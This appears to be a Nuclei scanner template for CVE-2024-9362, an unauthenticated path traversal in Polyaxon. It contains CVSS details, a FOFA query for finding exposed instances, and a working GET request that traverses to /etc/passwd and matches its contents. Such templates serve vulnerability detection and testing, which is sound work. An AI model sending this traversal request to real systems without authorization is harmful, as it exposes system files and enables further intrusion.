id: CVE-2024-9362 info: name: Polyaxon - Unauthenticated Directory Traversal author: yunseo severity: high description: | Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication. impact: | Attackers can access sensitive system directories and files, leading to information disclosure and potential further exploitation. remediation: | Update to the latest version with patched validation mechanisms. reference: - https://github.com/polyaxon/polyaxon - https://huntr.com/bounties/d8dcb40f-ce76-4524-8d06-e0f12a07809d classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-9362 epss-score: 0.0428 epss-percentile: 0.90095 cwe-id: CWE-22 metadata: max-request: 1 verified: true fofa-query: title=="Polyaxon" tags: cve,cve2024,polyaxon,lfi,traversal,unauth http: - method: GET path: - "{{BaseURL}}/streams/v1/polyaxon/default/s/runs/%2e%2e/artifact?stream=true&path=../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502202dc431001d1d0b492b080880e289572a655c5387429e5ebd2c5a6356f591a36102210096d70e6d51a921389bf77a5661bdc162df4634bb982f35f8c07075880e2db41f:922c64590222798bb761d5b6d8e72950